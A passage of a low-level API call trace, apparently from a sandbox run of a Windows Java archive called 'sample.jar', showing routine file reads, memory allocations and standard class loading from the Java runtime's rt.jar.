[0101.566] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310035a, lpNewFilePointer=0x208dea0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dea0*=51381082) returned 1 [0101.566] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0xd40, lpNumberOfBytesRead=0x208de70, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208de70*=0xd40, lpOverlapped=0x0) returned 1 [0101.566] free (_Block=0x12292f30) [0101.567] free (_Block=0x1228e230) [0101.577] wcslen (_String="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned 0x24 [0101.577] malloc (_Size=0x54) returned 0x12228a00 [0101.577] wcscpy (in: _Dest=0x12228a00, _Source="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar" [0101.577] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2c0 [0101.577] GetFileTime (in: hFile=0x2c0, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208f4c8 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208f4c8*(dwLowDateTime=0x9ccdf400, dwHighDateTime=0x1d7cbd3)) returned 1 [0101.577] CloseHandle (hObject=0x2c0) returned 1 [0101.578] free (_Block=0x12228a00) [0101.579] malloc (_Size=0x25) returned 0x12221ea0 [0101.579] _errno () returned 0x20f6be0 [0101.580] strlen (_Str="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned 0x24 [0101.580] strcpy (in: _Dest=0x208f080, _Source="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar" [0101.580] strcmp (_Str1="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 1 [0101.580] wcslen (_String="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned 0x24 [0101.580] malloc (_Size=0x54) returned 0x12228ee0 [0101.580] wcscpy (in: _Dest=0x12228ee0, _Source="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar") returned="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar" [0101.580] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0 [0101.581] free (_Block=0x12228ee0) [0101.581] calloc (_Count=0x1, _Size=0xa8) returned 0x122965e0 [0101.581] ReadFile (in: hFile=0x2c0, lpBuffer=0x208f360, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x208f310, lpOverlapped=0x0 | out: lpBuffer=0x208f360*, lpNumberOfBytesRead=0x208f310*=0x4, lpOverlapped=0x0) returned 1 [0101.582] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x208f340, dwMoveMethod=0x2 | out: lpNewFilePointer=0x208f340*=722976) returned 1 [0101.582] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb07a0, lpNewFilePointer=0x208f110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f110*=722848) returned 1 [0101.582] ReadFile (in: hFile=0x2c0, lpBuffer=0x208f170, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x208f0e0, lpOverlapped=0x0 | out: lpBuffer=0x208f170*, lpNumberOfBytesRead=0x208f0e0*=0x80, lpOverlapped=0x0) returned 1 [0101.583] free (_Block=0x12221ea0) [0101.584] strlen (_Str="sun/misc/PerfCounter.class") returned 0x1a [0101.584] malloc (_Size=0x48) returned 0x1228ebe0 [0101.584] malloc (_Size=0xa0) returned 0x12296730 [0101.584] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34184fb, lpNewFilePointer=0x208e250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e250*=54625531) returned 1 [0101.584] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e220, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e220*=0xa0, lpOverlapped=0x0) returned 1 [0101.586] malloc (_Size=0x1b) returned 0x12221ba0 [0101.586] strlen (_Str="sun/misc/PerfCounter.class") returned 0x1a [0101.586] strcpy (in: _Dest=0x208e3d0, _Source="sun/misc/PerfCounter.class" | out: _Dest="sun/misc/PerfCounter.class") returned="sun/misc/PerfCounter.class" [0101.586] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ff8e5, lpNewFilePointer=0x208de50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de50*=51378405) returned 1 [0101.586] ReadFile (in: hFile=0x134, lpBuffer=0x208dea0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208de20, lpOverlapped=0x0 | out: lpBuffer=0x208dea0*, lpNumberOfBytesRead=0x208de20*=0x1e, lpOverlapped=0x0) returned 1 [0101.592] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ff91d, lpNewFilePointer=0x208deb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208deb0*=51378461) returned 1 [0101.592] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0xa03, lpNumberOfBytesRead=0x208de80, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208de80*=0xa03, lpOverlapped=0x0) returned 1 [0101.593] free (_Block=0x12221e10) [0101.594] free (_Block=0x1228eb40) [0101.603] strlen (_Str="sun/misc/Perf$GetPerfAction.class") returned 0x21 [0101.603] malloc (_Size=0x48) returned 0x1228ee10 [0101.603] malloc (_Size=0xa0) returned 0x12296730 [0101.603] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34184ac, lpNewFilePointer=0x208dbd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbd0*=54625452) returned 1 [0101.603] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dba0, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208dba0*=0xa0, lpOverlapped=0x0) returned 1 [0101.604] malloc (_Size=0x22) returned 0x12221e10 [0101.604] strlen (_Str="sun/misc/Perf$GetPerfAction.class") returned 0x21 [0101.604] strcpy (in: _Dest=0x208dd50, _Source="sun/misc/Perf$GetPerfAction.class" | out: _Dest="sun/misc/Perf$GetPerfAction.class") returned="sun/misc/Perf$GetPerfAction.class" [0101.604] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ff6ca, lpNewFilePointer=0x208d7d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7d0*=51377866) returned 1 [0101.604] ReadFile (in: hFile=0x134, lpBuffer=0x208d820, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d7a0, lpOverlapped=0x0 | out: lpBuffer=0x208d820*, lpNumberOfBytesRead=0x208d7a0*=0x1e, lpOverlapped=0x0) returned 1 [0101.605] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ff709, lpNewFilePointer=0x208d830, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d830*=51377929) returned 1 [0101.605] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x1dc, lpNumberOfBytesRead=0x208d800, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208d800*=0x1dc, lpOverlapped=0x0) returned 1 [0101.605] free (_Block=0x12221ba0) [0101.606] free (_Block=0x1228ebe0) [0101.611] strlen (_Str="sun/misc/Perf.class") returned 0x13 [0101.611] malloc (_Size=0x48) returned 0x1228eaf0 [0101.611] malloc (_Size=0xa0) returned 0x12296730 [0101.611] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341846b, lpNewFilePointer=0x208ccc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccc0*=54625387) returned 1 [0101.611] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc90, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208cc90*=0xa0, lpOverlapped=0x0) returned 1 [0101.611] malloc (_Size=0x14) returned 0x12292f10 [0101.611] strlen (_Str="sun/misc/Perf.class") returned 0x13 [0101.612] strcpy (in: _Dest=0x208ce40, _Source="sun/misc/Perf.class" | out: _Dest="sun/misc/Perf.class") returned="sun/misc/Perf.class" [0101.612] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fec0a, lpNewFilePointer=0x208c8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8c0*=51375114) returned 1 [0101.612] ReadFile (in: hFile=0x134, lpBuffer=0x208c910, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c890, lpOverlapped=0x0 | out: lpBuffer=0x208c910*, lpNumberOfBytesRead=0x208c890*=0x1e, lpOverlapped=0x0) returned 1 [0101.617] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fec3b, lpNewFilePointer=0x208c920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c920*=51375163) returned 1 [0101.617] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0xa8f, lpNumberOfBytesRead=0x208c8f0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208c8f0*=0xa8f, lpOverlapped=0x0) returned 1 [0101.618] free (_Block=0x12221e10) [0101.619] free (_Block=0x1228ee10) [0101.629] malloc (_Size=0x48) returned 0x1228e460 [0101.629] malloc (_Size=0xa0) returned 0x12296730 [0101.629] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418416, lpNewFilePointer=0x208e370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e370*=54625302) returned 1 [0101.629] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e340, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e340*=0xa0, lpOverlapped=0x0) returned 1 [0101.629] malloc (_Size=0x28) returned 0x12221ea0 [0101.629] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fe8d4, lpNewFilePointer=0x208df70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df70*=51374292) returned 1 [0101.629] ReadFile (in: hFile=0x134, lpBuffer=0x208dfc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208df40, lpOverlapped=0x0 | out: lpBuffer=0x208dfc0*, lpNumberOfBytesRead=0x208df40*=0x1e, lpOverlapped=0x0) returned 1 [0101.630] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fe919, lpNewFilePointer=0x208dfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfd0*=51374361) returned 1 [0101.630] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x2f1, lpNumberOfBytesRead=0x208dfa0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208dfa0*=0x2f1, lpOverlapped=0x0) returned 1 [0101.631] malloc (_Size=0x48) returned 0x1228ecd0 [0101.631] malloc (_Size=0xa0) returned 0x12296730 [0101.631] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34183cb, lpNewFilePointer=0x208dfb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfb0*=54625227) returned 1 [0101.663] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208df80, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208df80*=0xa0, lpOverlapped=0x0) returned 1 [0101.663] malloc (_Size=0x1e) returned 0x12221e10 [0101.663] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fe7e1, lpNewFilePointer=0x208dbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbb0*=51374049) returned 1 [0101.663] ReadFile (in: hFile=0x134, lpBuffer=0x208dc00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208db80, lpOverlapped=0x0 | out: lpBuffer=0x208dc00*, lpNumberOfBytesRead=0x208db80*=0x1e, lpOverlapped=0x0) returned 1 [0101.663] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fe81c, lpNewFilePointer=0x208dc10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc10*=51374108) returned 1 [0101.663] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0xb8, lpNumberOfBytesRead=0x208dbe0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208dbe0*=0xb8, lpOverlapped=0x0) returned 1 [0101.664] malloc (_Size=0x48) returned 0x1228e6e0 [0101.664] malloc (_Size=0xa0) returned 0x12296730 [0101.664] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341837e, lpNewFilePointer=0x208dfb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfb0*=54625150) returned 1 [0101.664] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208df80, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208df80*=0xa0, lpOverlapped=0x0) returned 1 [0101.664] malloc (_Size=0x20) returned 0x12221ea0 [0101.665] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fbcc9, lpNewFilePointer=0x208dbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbb0*=51363017) returned 1 [0101.665] ReadFile (in: hFile=0x134, lpBuffer=0x208dc00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208db80, lpOverlapped=0x0 | out: lpBuffer=0x208dc00*, lpNumberOfBytesRead=0x208db80*=0x1e, lpOverlapped=0x0) returned 1 [0101.779] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fbd06, lpNewFilePointer=0x208dc10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc10*=51363078) returned 1 [0101.779] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x2adb, lpNumberOfBytesRead=0x208dbe0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208dbe0*=0x2adb, lpOverlapped=0x0) returned 1 [0101.800] malloc (_Size=0x48) returned 0x1228ebe0 [0101.800] malloc (_Size=0xa0) returned 0x12296730 [0101.800] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418331, lpNewFilePointer=0x208d570, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d570*=54625073) returned 1 [0101.800] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d540, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208d540*=0xa0, lpOverlapped=0x0) returned 1 [0101.801] malloc (_Size=0x20) returned 0x12221f00 [0101.801] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fb6e8, lpNewFilePointer=0x208d170, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d170*=51361512) returned 1 [0101.801] ReadFile (in: hFile=0x134, lpBuffer=0x208d1c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d140, lpOverlapped=0x0 | out: lpBuffer=0x208d1c0*, lpNumberOfBytesRead=0x208d140*=0x1e, lpOverlapped=0x0) returned 1 [0101.801] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fb725, lpNewFilePointer=0x208d1d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1d0*=51361573) returned 1 [0101.801] ReadFile (in: hFile=0x134, lpBuffer=0x1225e5e0, nNumberOfBytesToRead=0x5a4, lpNumberOfBytesRead=0x208d1a0, lpOverlapped=0x0 | out: lpBuffer=0x1225e5e0*, lpNumberOfBytesRead=0x208d1a0*=0x5a4, lpOverlapped=0x0) returned 1 [0101.805] malloc (_Size=0x48) returned 0x1228eb40 [0101.805] malloc (_Size=0xa0) returned 0x12296730 [0101.805] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34182e3, lpNewFilePointer=0x208da40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da40*=54624995) returned 1 [0101.805] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208da10, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208da10*=0xa0, lpOverlapped=0x0) returned 1 [0101.805] malloc (_Size=0x21) returned 0x12221e10 [0101.805] strlen (_Str="java/nio/DirectLongBufferU.class") returned 0x20 [0101.806] strcpy (in: _Dest=0x208dbc0, _Source="java/nio/DirectLongBufferU.class" | out: _Dest="java/nio/DirectLongBufferU.class") returned="java/nio/DirectLongBufferU.class" [0101.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fa833, lpNewFilePointer=0x208d640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d640*=51357747) returned 1 [0101.806] ReadFile (in: hFile=0x134, lpBuffer=0x208d690, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d610, lpOverlapped=0x0 | out: lpBuffer=0x208d690*, lpNumberOfBytesRead=0x208d610*=0x1e, lpOverlapped=0x0) returned 1 [0101.903] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30fa871, lpNewFilePointer=0x208d6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d6a0*=51357809) returned 1 [0101.903] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0xe77, lpNumberOfBytesRead=0x208d670, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208d670*=0xe77, lpOverlapped=0x0) returned 1 [0101.904] free (_Block=0x12221f00) [0101.904] free (_Block=0x1228ebe0) [0101.909] strlen (_Str="java/nio/LongBuffer.class") returned 0x19 [0101.909] malloc (_Size=0x48) returned 0x1228ea00 [0101.909] malloc (_Size=0xa0) returned 0x12296730 [0101.909] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341829c, lpNewFilePointer=0x208d000, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d000*=54624924) returned 1 [0101.909] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cfd0, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208cfd0*=0xa0, lpOverlapped=0x0) returned 1 [0101.909] malloc (_Size=0x1a) returned 0x12221ea0 [0101.909] strlen (_Str="java/nio/LongBuffer.class") returned 0x19 [0101.910] strcpy (in: _Dest=0x208d180, _Source="java/nio/LongBuffer.class" | out: _Dest="java/nio/LongBuffer.class") returned="java/nio/LongBuffer.class" [0101.910] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f9ac1, lpNewFilePointer=0x208cc00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc00*=51354305) returned 1 [0101.910] ReadFile (in: hFile=0x134, lpBuffer=0x208cc50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cbd0, lpOverlapped=0x0 | out: lpBuffer=0x208cc50*, lpNumberOfBytesRead=0x208cbd0*=0x1e, lpOverlapped=0x0) returned 1 [0101.964] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f9af8, lpNewFilePointer=0x208cc60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc60*=51354360) returned 1 [0101.964] ReadFile (in: hFile=0x134, lpBuffer=0x1225c980, nNumberOfBytesToRead=0xd3b, lpNumberOfBytesRead=0x208cc30, lpOverlapped=0x0 | out: lpBuffer=0x1225c980*, lpNumberOfBytesRead=0x208cc30*=0xd3b, lpOverlapped=0x0) returned 1 [0101.965] free (_Block=0x12221e10) [0101.965] free (_Block=0x1228eb40) [0102.011] malloc (_Size=0x48) returned 0x1228e280 [0102.011] malloc (_Size=0xa0) returned 0x12296730 [0102.011] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb061e, lpNewFilePointer=0x208eea0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208eea0*=722462) returned 1 [0102.011] ReadFile (in: hFile=0x2c0, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ee70, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208ee70*=0xa0, lpOverlapped=0x0) returned 1 [0102.011] malloc (_Size=0x15) returned 0x12293450 [0102.013] strlen (_Str="java/util/zip/ZipEntry.class") returned 0x1c [0102.013] malloc (_Size=0x48) returned 0x1228e960 [0102.013] malloc (_Size=0xa0) returned 0x12296730 [0102.013] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34181bd, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=54624701) returned 1 [0102.013] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e390*=0xa0, lpOverlapped=0x0) returned 1 [0102.013] malloc (_Size=0x1d) returned 0x121d7af0 [0102.013] strlen (_Str="java/util/zip/ZipEntry.class") returned 0x1c [0102.014] strcpy (in: _Dest=0x208e540, _Source="java/util/zip/ZipEntry.class" | out: _Dest="java/util/zip/ZipEntry.class") returned="java/util/zip/ZipEntry.class" [0102.014] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f53f9, lpNewFilePointer=0x208dfc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfc0*=51336185) returned 1 [0102.014] ReadFile (in: hFile=0x134, lpBuffer=0x208e010, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208df90, lpOverlapped=0x0 | out: lpBuffer=0x208e010*, lpNumberOfBytesRead=0x208df90*=0x1e, lpOverlapped=0x0) returned 1 [0102.059] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f5433, lpNewFilePointer=0x208e020, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e020*=51336243) returned 1 [0102.059] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x11f4, lpNumberOfBytesRead=0x208dff0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208dff0*=0x11f4, lpOverlapped=0x0) returned 1 [0102.093] free (_Block=0x12221ea0) [0102.094] free (_Block=0x1228ea00) [0102.120] strlen (_Str="sun/nio/cs/UTF_8$Decoder.class") returned 0x1e [0102.120] malloc (_Size=0x48) returned 0x1228e870 [0102.120] malloc (_Size=0xa0) returned 0x12296730 [0102.120] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340578e, lpNewFilePointer=0x208e260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e260*=54548366) returned 1 [0102.120] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e230, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e230*=0xa0, lpOverlapped=0x0) returned 1 [0102.121] malloc (_Size=0x1f) returned 0x12221ea0 [0102.121] strlen (_Str="sun/nio/cs/UTF_8$Decoder.class") returned 0x1e [0102.121] strcpy (in: _Dest=0x208e3e0, _Source="sun/nio/cs/UTF_8$Decoder.class" | out: _Dest="sun/nio/cs/UTF_8$Decoder.class") returned="sun/nio/cs/UTF_8$Decoder.class" [0102.121] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e00c5b, lpNewFilePointer=0x208de60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de60*=48237659) returned 1 [0102.121] ReadFile (in: hFile=0x134, lpBuffer=0x208deb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208de30, lpOverlapped=0x0 | out: lpBuffer=0x208deb0*, lpNumberOfBytesRead=0x208de30*=0x1e, lpOverlapped=0x0) returned 1 [0102.206] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e00c97, lpNewFilePointer=0x208dec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dec0*=48237719) returned 1 [0102.206] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x18c0, lpNumberOfBytesRead=0x208de90, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208de90*=0x18c0, lpOverlapped=0x0) returned 1 [0102.337] free (_Block=0x121d7af0) [0102.338] free (_Block=0x1228e960) [0102.352] malloc (_Size=0x48) returned 0x1228e690 [0102.352] malloc (_Size=0xa0) returned 0x12296730 [0102.352] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418167, lpNewFilePointer=0x208e4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4d0*=54624615) returned 1 [0102.352] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e4a0, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e4a0*=0xa0, lpOverlapped=0x0) returned 1 [0102.354] malloc (_Size=0x29) returned 0x12298e80 [0102.354] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f4d2e, lpNewFilePointer=0x208e0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0d0*=51334446) returned 1 [0102.354] ReadFile (in: hFile=0x134, lpBuffer=0x208e120, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e0a0, lpOverlapped=0x0 | out: lpBuffer=0x208e120*, lpNumberOfBytesRead=0x208e0a0*=0x1e, lpOverlapped=0x0) returned 1 [0102.416] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f4d74, lpNewFilePointer=0x208e130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e130*=51334516) returned 1 [0102.417] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x685, lpNumberOfBytesRead=0x208e100, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e100*=0x685, lpOverlapped=0x0) returned 1 [0102.418] malloc (_Size=0x48) returned 0x1228eb40 [0102.418] malloc (_Size=0xa0) returned 0x12296730 [0102.418] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341811d, lpNewFilePointer=0x208da90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da90*=54624541) returned 1 [0102.418] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208da60, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208da60*=0xa0, lpOverlapped=0x0) returned 1 [0102.418] malloc (_Size=0x1d) returned 0x121d7af0 [0102.418] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f495c, lpNewFilePointer=0x208d690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d690*=51333468) returned 1 [0102.418] ReadFile (in: hFile=0x134, lpBuffer=0x208d6e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d660, lpOverlapped=0x0 | out: lpBuffer=0x208d6e0*, lpNumberOfBytesRead=0x208d660*=0x1e, lpOverlapped=0x0) returned 1 [0102.418] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f4996, lpNewFilePointer=0x208d6f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d6f0*=51333526) returned 1 [0102.418] ReadFile (in: hFile=0x134, lpBuffer=0x1225c190, nNumberOfBytesToRead=0x398, lpNumberOfBytesRead=0x208d6c0, lpOverlapped=0x0 | out: lpBuffer=0x1225c190*, lpNumberOfBytesRead=0x208d6c0*=0x398, lpOverlapped=0x0) returned 1 [0102.420] strlen (_Str="java/util/zip/ZipFile$ZipFileInputStream.class") returned 0x2e [0102.420] malloc (_Size=0x48) returned 0x1228e3c0 [0102.421] malloc (_Size=0xa0) returned 0x12296730 [0102.421] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34180c1, lpNewFilePointer=0x208e4b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4b0*=54624449) returned 1 [0102.421] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e480, 